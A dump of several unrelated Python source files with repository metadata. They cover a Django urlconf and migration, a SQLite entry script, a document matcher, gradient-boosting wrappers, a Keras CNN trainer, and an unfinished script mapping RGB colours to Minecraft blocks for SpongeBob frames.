6e449b1da6d95ab7afb532a4a76d724be666ae4f
|
[
"MIT"
] | null | null | null |
django_project_template/django_project_template/apps/app/urls.py
|
eduardolujan/django_project_template
|
6e449b1da6d95ab7afb532a4a76d724be666ae4f
|
[
"MIT"
] | null | null | null |
from django.conf.urls.static import static
from django.conf.urls import patterns, url, include
from django.conf import settings
from django.contrib import admin
from apps.app.views import *
admin.autodiscover()
urlpatterns = patterns('',
url(r'^/?$','apps.app.views.index',name='index'),
)
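# --- Hedged note (not part of the original urlconf) ---
# django.conf.urls.patterns() was deprecated in Django 1.8 and removed in 1.10.
# Under a modern Django the same routing would look roughly like the sketch
# below, assuming the index view is importable from apps.app.views as the
# string reference above suggests.
#
#   from django.urls import path
#   from apps.app import views
#
#   urlpatterns = [
#       path('', views.index, name='index'),
#   ]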
| 26.636364
| 51
| 0.757679
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 38
| 0.129693
|
af6346ccaefda878793e2d456fe00155edd718ff
| 483
|
py
|
Python
|
m5.py
|
mohitalivenetsolutions/alivenet-python-training
|
19968bbec0b9a44884e0175414342a8ca4ebb1fd
|
[
"MIT"
] | null | null | null |
m5.py
|
mohitalivenetsolutions/alivenet-python-training
|
19968bbec0b9a44884e0175414342a8ca4ebb1fd
|
[
"MIT"
] | 1
|
2018-07-17T17:09:38.000Z
|
2018-07-17T17:09:38.000Z
|
m5.py
|
mohitalivenetsolutions/alivenet-python-training
|
19968bbec0b9a44884e0175414342a8ca4ebb1fd
|
[
"MIT"
] | null | null | null |
#list
list=["Apple","Mango","Banana","Pine Apple","Plum"]
for lst in list :
if lst=='Banana':
continue
else:
print(lst)
#tuples
tpls = ("apple", "banana", "cherry","banana",)
print("Tuples:",tpls)
#Set
st = set(("apple", "banana", "cherry"))
st.add("damson")
st.remove("banana")
print("Set:",st)
print("Length",len(st))
#Dictionary
dct = dict(apple="green", banana="yellow", cherry="red")
del(dct["banana"])
print("Dictionary:",dct)
| 20.125
| 57
| 0.583851
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 213
| 0.440994
|
af63f358d135bd02b0acb291df904454267fe7f6
| 546
|
py
|
Python
|
pokemon.py
|
videogamerm/pokemon_database
|
e33cb420fdd1053d55d178e230c095dedcffff76
|
[
"MIT"
] | null | null | null |
pokemon.py
|
videogamerm/pokemon_database
|
e33cb420fdd1053d55d178e230c095dedcffff76
|
[
"MIT"
] | null | null | null |
pokemon.py
|
videogamerm/pokemon_database
|
e33cb420fdd1053d55d178e230c095dedcffff76
|
[
"MIT"
] | null | null | null |
import sqlite3
import time
import random
conn = sqlite3.connect('pokemon.db')
c = conn.cursor()
id = 0
def dynamic_data_entry():
name = input ("Name: ")
health = input ("Health: ")
stage = input ("Stage:")
ptype = input("Type: ")
retreat = input ("Retreat: ")
year = input ("Year: ")
c.execute("INSERT INTO pm VALUES ( ?,?,?,?,?,?,? )",
(id,name,health,stage,ptype,retreat,year))
conn.commit()
for i in range(600):
dynamic_data_entry()
time.sleep(1)
id += 1
c.close()
conn.close()
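# --- Hedged read-back sketch (not part of the original script) ---
# Assuming the pm table was created elsewhere with the seven columns inserted
# above, the rows written by dynamic_data_entry() can be inspected like this:
check = sqlite3.connect('pokemon.db')
for row in check.execute("SELECT * FROM pm LIMIT 5"):
    print(row)
check.close()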
| 17.0625
| 56
| 0.580586
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 106
| 0.194139
|
af6432d71105fd52d5f472fb3ff046ac0d326424
| 2,603
|
py
|
Python
|
sqlpie/services/matcher.py
|
lessaworld/sqlpie
|
22cac1fc7f9cb939e823058f84a68988e03ab239
|
[
"MIT"
] | 3
|
2016-01-27T19:49:23.000Z
|
2020-08-18T13:59:02.000Z
|
sqlpie/services/matcher.py
|
lessaworld/sqlpie
|
22cac1fc7f9cb939e823058f84a68988e03ab239
|
[
"MIT"
] | null | null | null |
sqlpie/services/matcher.py
|
lessaworld/sqlpie
|
22cac1fc7f9cb939e823058f84a68988e03ab239
|
[
"MIT"
] | 1
|
2016-02-01T01:57:54.000Z
|
2016-02-01T01:57:54.000Z
|
# -*- coding: utf-8 -*-
"""
SQLpie License (MIT License)
Copyright (c) 2011-2016 André Lessa, http://sqlpie.com
See LICENSE file.
"""
from flask import g
import sqlpie
import math, json
class Matcher(object):
def __init__(self):
pass
@staticmethod
def match_single(source_bucket, document_id, search_bucket, max_matches=1, filter_query=""):
        # Read the doc, get its top-N idf terms, and use those in the query.
engine = sqlpie.Searcher(filter_query)
results = engine.run_docmatching(source_bucket, document_id, search_bucket, max_matches)
return results
@staticmethod
def match_all(source_bucket, search_bucket, max_matches, filter_query, output_predicate=None):
engine = sqlpie.Searcher(filter_query)
num_observations = 0
if output_predicate is None:
output_predicate = "match_" + source_bucket.lower().strip() + "_" + search_bucket.lower().strip()
# Delete observations from specific predicate (match_<bucket>_<search_bucket>)
sqlpie.Observation.remove({"predicate":output_predicate})
sb = sqlpie.Bucket(source_bucket)
sql = ["bucket_id = UNHEX(%s)", sb.bucket_id]
docs = sqlpie.Document.select(sql)
is_encoded_document_id = True
# Loop each document from bucket
for d in docs:
document_id = d[1]
# Get scored best matches for each document
results = engine.run_docmatching(source_bucket, document_id, search_bucket, max_matches, is_encoded_document_id)
observations = []
for r in results:
# Store scored matches/results as observations
num_observations = num_observations + 1
observation = {"subject_bucket":source_bucket, "object_bucket":search_bucket, "subject_id":document_id, \
"predicate":output_predicate, "object_id":r[sqlpie.Document.ID_FIELD], \
"value":r[sqlpie.Document.SCORE_FIELD]}
observations.append(sqlpie.Observation(observation))
if len(observations) > 0:
sqlpie.Observation.add_multiple(observations)
return (num_observations, output_predicate)
@staticmethod
def match_document(document, search_bucket, max_matches, filter_query):
term_ids = sqlpie.Indexer.parse_features(document, False, True)
engine = sqlpie.Searcher(filter_query)
results = engine.run_docmatching(None, None, search_bucket, max_matches, False, term_ids)
return results
| 40.671875
| 124
| 0.659624
| 2,412
| 0.926267
| 0
| 0
| 2,334
| 0.896313
| 0
| 0
| 529
| 0.203149
|
af650e570346dc05a0790bc50a568e6fc7bd4055
| 811
|
py
|
Python
|
registry/smart_contract/migrations/0009_auto_20180717_1242.py
|
RustamSultanov/Python-test-registry-
|
1d779a8135567a0b3aeca0151b2d7f0905014e88
|
[
"MIT"
] | 1
|
2019-01-16T14:52:37.000Z
|
2019-01-16T14:52:37.000Z
|
registry/smart_contract/migrations/0009_auto_20180717_1242.py
|
RustamSultanov/Python-test-registry-
|
1d779a8135567a0b3aeca0151b2d7f0905014e88
|
[
"MIT"
] | 8
|
2019-10-21T16:18:33.000Z
|
2021-06-08T20:33:14.000Z
|
registry/smart_contract/migrations/0009_auto_20180717_1242.py
|
RustamSultanov/Python-test-registry-
|
1d779a8135567a0b3aeca0151b2d7f0905014e88
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.7 on 2018-07-17 12:42
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('smart_contract', '0008_useraccept_company'),
]
operations = [
migrations.CreateModel(
name='Competence',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('competence_name', models.CharField(max_length=256)),
],
),
migrations.AddField(
model_name='comment',
name='competence',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='smart_contract.Competence'),
),
]
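# --- Hedged sketch (not part of the migration) ---
# The model state implied by the operations above looks roughly like this;
# Competence comes straight from CreateModel, while Comment's other fields are
# defined in migrations 0001-0008 and are omitted here.
#
#   from django.db import models
#
#   class Competence(models.Model):
#       competence_name = models.CharField(max_length=256)
#
#   class Comment(models.Model):
#       ...  # fields from earlier migrations
#       competence = models.ForeignKey('Competence', blank=True, null=True,
#                                      on_delete=models.CASCADE)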
| 30.037037
| 136
| 0.61529
| 685
| 0.844636
| 0
| 0
| 0
| 0
| 0
| 0
| 173
| 0.213317
|
af664d7b09e7e9a2561541c3ca78ef9e440f0b18
| 5,554
|
py
|
Python
|
src/mlregression/estimator/boosting.py
|
muhlbach/ml-regression
|
59dfa5acc9841729d632030492e029bb329ce3ed
|
[
"MIT"
] | 1
|
2021-11-12T22:45:32.000Z
|
2021-11-12T22:45:32.000Z
|
src/mlregression/estimator/boosting.py
|
muhlbach/ml-regression
|
59dfa5acc9841729d632030492e029bb329ce3ed
|
[
"MIT"
] | 1
|
2021-11-15T22:14:10.000Z
|
2021-11-16T15:56:14.000Z
|
src/mlregression/estimator/boosting.py
|
muhlbach/ml-regression
|
59dfa5acc9841729d632030492e029bb329ce3ed
|
[
"MIT"
] | null | null | null |
#------------------------------------------------------------------------------
# Libraries
#------------------------------------------------------------------------------
# Standard
import numpy as np
import xgboost as xgb
import lightgbm as lgbm
#------------------------------------------------------------------------------
# XGBoost
#------------------------------------------------------------------------------
class XGBRegressor(xgb.XGBRegressor):
"""
This class copies verbatim the XGBoost regressor as of version 1.5.0
See: https://xgboost.readthedocs.io/en/latest/python/python_api.html#module-xgboost.sklearn
"""
# -------------------------------------------------------------------------
# Constructor function
# -------------------------------------------------------------------------
def __init__(self,
n_estimators=200, # Default 100
max_depth=None,
learning_rate=1,
verbosity=0,
objective='reg:squarederror',
booster=None,
tree_method=None,
n_jobs=1,
gamma=None,
min_child_weight=None,
max_delta_step=None,
subsample=0.8,
colsample_bytree=None,
colsample_bylevel=None,
colsample_bynode=0.8,
reg_alpha=None,
reg_lambda=1e-05,
scale_pos_weight=None,
base_score=None,
random_state=1991,
missing=np.nan,
num_parallel_tree=None,
monotone_constraints=None,
interaction_constraints=None,
importance_type='gain',
gpu_id=None,
validate_parameters=None,
enable_categorical=False,
predictor=None
):
super().__init__(
n_estimators=n_estimators,
max_depth=max_depth,
learning_rate=learning_rate,
            verbosity=verbosity,
            objective=objective,
booster=booster,
tree_method=tree_method,
n_jobs=n_jobs,
gamma=gamma,
min_child_weight=min_child_weight,
max_delta_step=max_delta_step,
subsample=subsample,
colsample_bytree=colsample_bytree,
colsample_bylevel=colsample_bylevel,
colsample_bynode=colsample_bynode,
reg_alpha=reg_alpha,
reg_lambda=reg_lambda,
scale_pos_weight=scale_pos_weight,
base_score=base_score,
random_state=random_state,
missing=missing,
num_parallel_tree=num_parallel_tree,
monotone_constraints=monotone_constraints,
interaction_constraints=interaction_constraints,
importance_type=importance_type,
gpu_id=gpu_id,
validate_parameters=validate_parameters,
enable_categorical=enable_categorical,
predictor=predictor,
)
# # Lazy implementation:
# class XGBRegressor(xgb.XGBRegressor):
# def __init__(self, **kwargs):
# super().__init__(**kwargs)
#------------------------------------------------------------------------------
# LightGBM
#------------------------------------------------------------------------------
class LGBMegressor(lgbm.LGBMRegressor):
"""
This class copies verbatim the LightGBM regressor as of version 3.2.1
See: https://lightgbm.readthedocs.io/en/latest/pythonapi/lightgbm.LGBMRegressor.html#lightgbm-lgbmregressor
"""
# -------------------------------------------------------------------------
# Constructor function
# -------------------------------------------------------------------------
def __init__(self,
boosting_type='gbdt',
num_leaves=31,
max_depth=-1,
learning_rate=0.1,
n_estimators=100,
subsample_for_bin=200000,
objective='regression',
class_weight=None,
min_split_gain=0.0,
min_child_weight=0.001,
min_child_samples=20,
subsample=1.0,
subsample_freq=0,
colsample_bytree=1.0,
reg_alpha=0.0,
reg_lambda=0.0,
random_state=None,
n_jobs=1,
silent='warn',
importance_type='split'
):
super().__init__(
boosting_type=boosting_type,
num_leaves=num_leaves,
max_depth=max_depth,
learning_rate=learning_rate,
n_estimators=n_estimators,
subsample_for_bin=subsample_for_bin,
objective=objective,
class_weight=class_weight,
min_split_gain=min_split_gain,
min_child_weight=min_child_weight,
min_child_samples=min_child_samples,
subsample=subsample,
subsample_freq=subsample_freq,
colsample_bytree=colsample_bytree,
reg_alpha=reg_alpha,
reg_lambda=reg_lambda,
random_state=random_state,
n_jobs=n_jobs,
silent=silent,
importance_type=importance_type
)
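# --- Hedged smoke test (not part of the original module) ---
# Exercises the inherited scikit-learn style fit/predict/score interface on
# random data; assumes xgboost and lightgbm are installed. Note the class is
# spelled LGBMegressor above, so the same spelling is used here.
if __name__ == "__main__":
    rng = np.random.default_rng(0)
    X = rng.random((200, 5))
    y = X @ np.array([1.0, -2.0, 0.5, 0.0, 3.0]) + 0.1 * rng.standard_normal(200)

    xgb_model = XGBRegressor(n_estimators=50)
    xgb_model.fit(X, y)
    print("XGBoost R^2:", xgb_model.score(X, y))

    lgbm_model = LGBMegressor(n_estimators=50)
    lgbm_model.fit(X, y)
    print("LightGBM R^2:", lgbm_model.score(X, y))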
| 39.112676
| 111
| 0.46507
| 4,816
| 0.867123
| 0
| 0
| 0
| 0
| 0
| 0
| 1,444
| 0.259993
|
af66914d6ab60784b54d7bda3a416c150d4d2a44
| 5,125
|
py
|
Python
|
ICPAR/trainer.py
|
RichardLeeK/CNM
|
a3c15cb0a0373d6ad03c5a815a7e020f90ab8522
|
[
"Apache-2.0"
] | null | null | null |
ICPAR/trainer.py
|
RichardLeeK/CNM
|
a3c15cb0a0373d6ad03c5a815a7e020f90ab8522
|
[
"Apache-2.0"
] | null | null | null |
ICPAR/trainer.py
|
RichardLeeK/CNM
|
a3c15cb0a0373d6ad03c5a815a7e020f90ab8522
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D, Dense, Dropout, Flatten
import keras.backend as K
import random
import os
import sys
sys.setrecursionlimit(1000000)
def data_load_module(tf):
file = open('int/' + tf + '_1_int_rev.csv')
lines = file.readlines()
file.close()
arr = np.load('npy/' + tf + '.abp.t.npy')
x = []; y = []; tl = []
for line in lines:
sl = line.split(',')
sid = int(sl[0])
#if float(sl[2]) > 60: continue
if int(sl[1]) == 1:
y.append([1, 0])
else:
y.append([0, 1])
tl.append(float(sl[2]))
x.append(arr[sid])
return x, y, tl
def rejection(x, y, tl):
pos_idx = []
neg_idx = []
for i in range(len(y)):
if y[i][0] == 0:
pos_idx.append(i)
else:
neg_idx.append(i)
lp = len(pos_idx)
ln = len(neg_idx)
acc_cnt = lp / ln if lp > ln else ln / lp
tot_idx = []
if lp > ln:
tot_idx = pos_idx
for i in range(int(acc_cnt)):
tot_idx.extend(neg_idx)
else:
tot_idx = neg_idx
for i in range(int(acc_cnt)):
tot_idx.extend(pos_idx)
random.shuffle(tot_idx)
new_x = []
new_y = []
new_tl = []
for idx in tot_idx:
new_x.append(x[idx])
new_y.append(y[idx])
new_tl.append(tl[idx])
return new_x, new_y, new_tl
def data_load(train_list, test_list):
train_x = []; train_y = []; train_tl = []
for tf in train_list:
x, y, tl = data_load_module(tf)
train_x.extend(x); train_y.extend(y); train_tl.extend(tl)
train_x, train_y, train_tl = rejection(train_x, train_y, train_tl)
test_x = []; test_y = []; test_tl = []
for tf in test_list:
x, y, tl = data_load_module(tf)
test_x.extend(x); test_y.extend(y); test_tl.extend(tl)
return train_x, train_y, train_tl, test_x, test_y, test_tl
def fold_data_load(i):
train_x = []; train_y = []; train_tl = []
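  # NOTE: this function appears to be an unfinished stub; it initialises the
  # lists above but never loads anything and is not called elsewhere in this script.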
def create_model(ipt_dim):
model = Sequential()
model.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=(ipt_dim, ipt_dim, 1)))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.25))
model.add(Dense(2, activation='softmax'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['binary_accuracy'])
return model
def performance_generator(tp, tn, fp, fn):
sen = tp / (tp + fn) if (tp + fn) > 0 else 0
spe = tn / (tn + fp) if (tn + fp) > 0 else 0
ppv = tp / (tp + fp) if (tp + fp) > 0 else 0
npv = tn / (tn + fn) if (tn + fn) > 0 else 0
npd = (sen + spe) / 2
acc = (tp + tn) / (tp + tn + fp + fn)
return [sen, spe, ppv, npv, npd, acc]
def counter(y):
pc = 0; nc = 0
for i in range(len(y)):
if round(y[i][0]) == 0:
pc += 1
else:
nc += 1
return pc, nc
def get_pred_perfomance(test_y, pred_y, time_line):
tp = 0; tn = 0; fp = 0; fn = 0;
tpt = 0; tnt = 0; fpt = 0; fnt = 0;
for i in range(len(pred_y)):
cp = round(pred_y[i][0])
ca = test_y[i][0]
if cp == ca:
if cp == 0:
tp += 1
tpt += time_line[i]
else:
tn += 1
tnt += time_line[i]
else:
if cp == 0:
fp += 1
fpt += time_line[i]
else:
fn += 1
fnt += time_line[i]
ca = performance_generator(tp, tn, fp, fn)
ta = performance_generator(tpt, tnt, fpt, fnt)
cs = str(tp) + ',' + str(tn) + ',' + str(fp) + ',' + str(fn)
for v in ca:
cs += ',' + str(v)
ts = str(tpt) + ',' + str(tnt) + ',' + str(fpt) + ',' + str(fnt)
for v in ta:
ts += ',' + str(v)
print('Count:' + cs)
print('Time:' + ts)
return cs + ',' + ts
def read_1_file(file, pos):
pid = file.split('.')[0].split('/')[-1]
f = open('int/'+pid+'_1_int_rev.csv')
lines = f.readlines()
f.close()
arr = np.load('npy/'+str(pos)+'/'+file)
x = []; y = []; tl = [];
for line in lines:
sl = line.split(',')
sid = int(sl[0])
if int(sl[1]) == 1:
y.append([1, 0])
else:
y.append([0, 1])
tl.append(float(sl[2]))
x.append(arr[sid])
return x, y, tl
def read_module(pos):
files = os.listdir('npy/' + str(pos))
test_x = []; test_y = []; test_tl = [];
train_x = []; train_y = []; train_tl = [];
for file in files:
if 'rep' in file:
if 'non' in file:
x, y, tl = read_1_file(file, pos)
test_x.extend(x); test_y.extend(y); test_tl.extend(tl)
else:
x, y, tl = read_1_file(file, pos)
train_x.extend(x); train_y.extend(y); train_tl.extend(tl)
return [train_x, train_y, train_tl], [test_x, test_y, test_tl]
if __name__=='__main__':
pos = 2
print(str(pos))
train, test = read_module(pos)
model = create_model(64)
model.fit(np.array(train[0]), np.array(train[1]), validation_data=(np.array(test[0]), np.array(test[1])), epochs=50)
model.save('net/CNN/'+str(pos)+'_CNN50.net')
pred = model.predict(np.array(test[0]))
sentence = get_pred_perfomance(test[1], pred, test[2])
pen = open('CNN_result.csv', 'a')
pen.write('\n' + str(pos) + ',' + sentence)
pen.close()
| 26.832461
| 118
| 0.575415
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 301
| 0.058732
|
af688d46de52f6336abb6ee7980f7d6335c0a120
| 569
|
py
|
Python
|
django/company/util/models.py
|
shortintern2020-A-labyrinth/TeamD
|
64245c837afd5c19f6383c5c68320ee4d1693021
|
[
"WTFPL"
] | 4
|
2020-08-21T05:09:23.000Z
|
2020-09-10T14:27:22.000Z
|
django/company/util/models.py
|
shortintern2020-A-labyrinth/TeamD
|
64245c837afd5c19f6383c5c68320ee4d1693021
|
[
"WTFPL"
] | 46
|
2020-08-21T07:00:10.000Z
|
2020-08-27T20:26:55.000Z
|
django/company/util/models.py
|
shortintern2020-A-labyrinth/TeamD
|
64245c837afd5c19f6383c5c68320ee4d1693021
|
[
"WTFPL"
] | null | null | null |
from django.core.mail import send_mail
from django.http import HttpResponse
from session.redis import SessionRedis
# Create your models here.
# Default argument values are provided for testing purposes
def post_mail(subject="題名", from_email="A4sittyo@gmail.com", to_email=["naoki@mail.com"], body="本文"):
send_mail(subject, body, from_email, to_email)
return HttpResponse('<h1>email send complete.</h1>')
# 中原航大
# Get the company_id
def get_company_id(token):
    # Get the value from the session
sessionRedis = SessionRedis()
str_time, company_id = sessionRedis.get(token)
return str_time, company_id
| 25.863636
| 101
| 0.752197
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 226
| 0.355906
|
af68e340a99686bea5c7fac8eebb634ebfbce94a
| 657
|
py
|
Python
|
gui/objects/graph/line_plot.py
|
abraker95/ultimate_osu_analyzer
|
bea58c997d13c3f461ccbe682f52799f0f88fdea
|
[
"MIT"
] | 23
|
2019-02-27T06:20:15.000Z
|
2022-03-31T22:54:11.000Z
|
gui/objects/graph/line_plot.py
|
abraker95/ultimate_osu_analyzer
|
bea58c997d13c3f461ccbe682f52799f0f88fdea
|
[
"MIT"
] | 38
|
2019-03-03T17:35:39.000Z
|
2021-08-23T20:43:34.000Z
|
gui/objects/graph/line_plot.py
|
abraker95/ultimate_osu_analyzer
|
bea58c997d13c3f461ccbe682f52799f0f88fdea
|
[
"MIT"
] | 4
|
2020-03-30T20:43:14.000Z
|
2022-03-06T19:40:15.000Z
|
from pyqtgraph.Qt import QtGui, QtCore
import pyqtgraph
import numpy as np
class LinePlot(pyqtgraph.PlotCurveItem):
def __init__(self):
super().__init__()
def update_data(self, data_x, data_y):
        if data_x is None or data_y is None:
self.setData(x=[], y=[])
return
# Filter out infinities
inf_filter = np.isfinite(data_y.astype(np.float64))
data_x, data_y = data_x[inf_filter], data_y[inf_filter]
self.setData(x=data_x, y=data_y)
return data_x, data_y
def update_xy(self, data_x, data_y):
self.setData(x=data_x, y=data_y)
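# --- Hedged illustration (not part of the original module) ---
# The essential behaviour of update_data() is the infinity filter; this
# standalone snippet reproduces just that step with NumPy, no Qt event loop needed.
if __name__ == "__main__":
    xs = np.array([0, 1, 2, 3, 4])
    ys = np.array([1.0, np.inf, 2.0, -np.inf, 3.0])
    keep = np.isfinite(ys.astype(np.float64))   # same mask built before setData()
    print(xs[keep], ys[keep])                   # [0 2 4] [1. 2. 3.]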
| 24.333333
| 68
| 0.630137
| 579
| 0.881279
| 0
| 0
| 0
| 0
| 0
| 0
| 23
| 0.035008
|
af69c8ebfb3a3b4a0f27bd8ba4d232051770a3d4
| 38,140
|
py
|
Python
|
spongebob_images/spongebob_rgb_values.py
|
JuicySeals/mc-spongebob-plugin
|
0df8d8e53705540314ebe6ef6ca411654bbeb56c
|
[
"MIT"
] | null | null | null |
spongebob_images/spongebob_rgb_values.py
|
JuicySeals/mc-spongebob-plugin
|
0df8d8e53705540314ebe6ef6ca411654bbeb56c
|
[
"MIT"
] | null | null | null |
spongebob_images/spongebob_rgb_values.py
|
JuicySeals/mc-spongebob-plugin
|
0df8d8e53705540314ebe6ef6ca411654bbeb56c
|
[
"MIT"
] | null | null | null |
from PIL import Image
from math import sqrt
import os
import time
import json
os.system('cls')
COLORS = {
"blocks_rgb":[
[
224,
220,
200
],
[
107,
88,
57
],
[
146,
99,
86
],
[
158,
164,
176
],
[
18,
18,
18
],
[
115,
115,
115
],
[
119,
85,
59
],
[
122,
122,
122
],
[
103,
121,
103
],
[
8,
10,
15
],
[
44,
46,
143
],
[
96,
59,
31
],
[
21,
119,
136
],
[
54,
57,
61
],
[
73,
91,
36
],
[
35,
137,
198
],
[
94,
168,
24
],
[
169,
48,
159
],
[
224,
97,
0
],
[
213,
101,
142
],
[
100,
31,
156
],
[
142,
32,
32
],
[
207,
213,
214
],
[
240,
175,
21
],
[
97,
219,
213
],
[
129,
140,
143
],
[
134,
96,
67
],
[
81,
217,
117
],
[
109,
128,
116
],
[
225,
230,
170
],
[
221,
223,
165
],
[
67,
30,
32
],
[
47,
64,
139
],
[
119,
106,
85
],
[
52,
118,
125
],
[
83,
90,
93
],
[
117,
142,
67
],
[
94,
164,
208
],
[
162,
197,
55
],
[
208,
100,
191
],
[
154,
147,
91
],
[
235,
154,
181
],
[
109,
48,
152
],
[
181,
59,
53
],
[
188,
212,
202
],
[
234,
192,
88
],
[
143,
118,
69
],
[
249,
236,
78
],
[
143,
139,
124
],
[
125,
173,
255
],
[
165,
194,
245
],
[
219,
219,
219
],
[
135,
130,
126
],
[
38,
67,
137
],
[
102,
112,
134
],
[
105,
99,
89
],
[
52,
40,
23
],
[
206,
206,
201
],
[
87,
67,
26
],
[
102,
81,
49
],
[
45,
28,
12
],
[
141,
145,
36
],
[
113,
88,
73
],
[
111,
54,
52
],
[
100,
67,
50
],
[
20,
18,
29
],
[
169,
91,
51
],
[
61,
39,
18
],
[
195,
179,
123
],
[
154,
110,
77
],
[
156,
127,
78
],
[
103,
77,
46
],
[
236,
233,
226
],
[
125,
84,
79
],
[
171,
27,
9
],
[
70,
43,
26
],
[
132,
107,
107
],
[
215,
208,
154
],
[
216,
209,
157
],
[
219,
211,
161
],
[
84,
64,
51
],
[
125,
125,
125
],
[
122,
122,
122
],
[
114,
119,
106
],
[
130,
131,
131
],
[
133,
133,
134
],
[
179,
179,
182
],
[
183,
183,
185
],
[
153,
113,
98
],
[
159,
114,
98
],
[
20,
21,
25
],
[
53,
57,
157
],
[
114,
71,
40
],
[
21,
137,
145
],
[
62,
68,
71
],
[
84,
109,
27
],
[
58,
175,
217
],
[
112,
185,
25
],
[
189,
68,
179
],
[
240,
118,
19
],
[
237,
141,
172
],
[
121,
42,
172
],
[
160,
39,
34
],
[
233,
236,
236
],
[
248,
197,
39
]
],
"224 220 200":[
"bone_block"
],
"107 88 57":[
"bookshelf"
],
"146 99 86":[
"bricks"
],
"158 164 176":[
"clay"
],
"18 18 18":[
"coal_block"
],
"115 115 115":[
"coal_ore"
],
"119 85 59":[
"coarse_dirt"
],
"122 122 122":[
"cobblestone"
],
"103 121 103":[
"mossy_cobblestone"
],
"8 10 15":[
"black_concrete"
],
"44 46 143":[
"blue_concrete"
],
"96 59 31":[
"brown_concrete"
],
"21 119 136":[
"cyan_concrete"
],
"54 57 61":[
"gray_concrete"
],
"73 91 36":[
"green_concrete"
],
"35 137 198":[
"light_blue_concrete"
],
"94 168 24":[
"lime_concrete"
],
"169 48 159":[
"magenta_concrete"
],
"224 97 0":[
"orange_concrete"
],
"213 101 142":[
"pink_concrete"
],
"100 31 156":[
"purple_concrete"
],
"142 32 32":[
"red_concrete"
],
"207 213 214":[
"white_concrete"
],
"240 175 21":[
"yellow_concrete"
],
"97 219 213":[
"diamond_block"
],
"129 140 143":[
"diamond_ore"
],
"134 96 67":[
"dirt"
],
"81 217 117":[
"emerald_block"
],
"109 128 116":[
"emerald_ore"
],
"225 230 170":[
"end_stone_bricks"
],
"221 223 165":[
"end_stone"
],
"67 30 32":[
"black_glazed_terracotta"
],
"47 64 139":[
"blue_glazed_terracotta"
],
"119 106 85":[
"brown_glazed_terracotta"
],
"52 118 125":[
"cyan_glazed_terracotta"
],
"83 90 93":[
"gray_glazed_terracotta"
],
"117 142 67":[
"green_glazed_terracotta"
],
"94 164 208":[
"light_blue_glazed_terracotta"
],
"162 197 55":[
"lime_glazed_terracotta"
],
"208 100 191":[
"magenta_glazed_terracotta"
],
"154 147 91":[
"orange_glazed_terracotta"
],
"235 154 181":[
"pink_glazed_terracotta"
],
"109 48 152":[
"purple_glazed_terracotta"
],
"181 59 53":[
"red_glazed_terracotta"
],
"188 212 202":[
"white_glazed_terracotta"
],
"234 192 88":[
"yellow_glazed_terracotta"
],
"143 118 69":[
"glowstone"
],
"249 236 78":[
"gold_block"
],
"143 139 124":[
"gold_ore"
],
"125 173 255":[
"ice"
],
"165 194 245":[
"packed_ice"
],
"219 219 219":[
"iron_block"
],
"135 130 126":[
"iron_ore"
],
"38 67 137":[
"lapis_block"
],
"102 112 134":[
"lapis_ore"
],
"105 99 89":[
"acacia_wood"
],
"52 40 23":[
"dark_oak_wood"
],
"206 206 201":[
"birch_wood"
],
"87 67 26":[
"jungle_wood"
],
"102 81 49":[
"oak_wood"
],
"45 28 12":[
"spruce_wood"
],
"141 145 36":[
"melon"
],
"113 88 73":[
"mycelium"
],
"111 54 52":[
"netherrack"
],
"100 67 50":[
"note_block"
],
"20 18 29":[
"obsidian"
],
"169 91 51":[
"acacia_planks"
],
"61 39 18":[
"dark_oak_planks"
],
"195 179 123":[
"birch_planks"
],
"154 110 77":[
"jungle_planks"
],
"156 127 78":[
"oak_planks"
],
"103 77 46":[
"spruce_planks"
],
"236 233 226":[
"quartz_block"
],
"125 84 79":[
"nether_quartz_ore"
],
"171 27 9":[
"redstone_block"
],
"70 43 26":[
"redstone_lamp"
],
"132 107 107":[
"redstone_ore"
],
"215 208 154":[
"sandstone"
],
"216 209 157":[
"sandstone"
],
"219 211 161":[
"sandstone"
],
"84 64 51":[
"soul_sand"
],
"125 125 125":[
"stone"
],
"114 119 106":[
"mossy_stone_bricks"
],
"130 131 131":[
"andesite"
],
"133 133 134":[
"polished_andesite"
],
"179 179 182":[
"diorite"
],
"183 183 185":[
"polished_diorite"
],
"153 113 98":[
"granite"
],
"159 114 98":[
"polished_granite"
],
"20 21 25":[
"black_wool"
],
"53 57 157":[
"blue_wool"
],
"114 71 40":[
"brown_wool"
],
"21 137 145":[
"cyan_wool"
],
"62 68 71":[
"gray_wool"
],
"84 109 27":[
"green_wool"
],
"58 175 217":[
"light_blue_wool"
],
"112 185 25":[
"lime_wool"
],
"189 68 179":[
"magenta_wool"
],
"240 118 19":[
"orange_wool"
],
"237 141 172":[
"pink_wool"
],
"121 42 172":[
"purple_wool"
],
"160 39 34":[
"red_wool"
],
"233 236 236":[
"white_wool"
],
"248 197 39":[
"yellow_wool"
]
}
# INSERT VARIABLES HERE
EPISODE_STRING = "ten"
SEASON_NUM = "01"
EPISODE_NUM = "10"
BEGINNING_FRAME = 104
EPISODE_FRAMES = 1414
#
# do this tmr
frame_rgb_data1 = {}
frame_rgb_data2 = {}
frame_rgb_data3 = {}
frame_rgb_data4 = {}
frame_rgb_data5 = {}
frame_rgb_data6 = {}
frame_rgb_data7 = {}
frame_rgb_data8 = {}
frame_rgb_data9 = {}
frame_rgb_data10 = {}
frame_rgb_data11 = {}
# spongebob frames
# 15-103 frames is the title sequence :D
for spongebob_frame in range(BEGINNING_FRAME, EPISODE_FRAMES+1):
os.system('cls')
print(f"On frame: {spongebob_frame}")
frame_string_string = ""
if spongebob_frame < 10:
frame_string_string = f"000{spongebob_frame}"
elif spongebob_frame < 100:
frame_string_string = f"00{spongebob_frame}"
elif spongebob_frame < 1000:
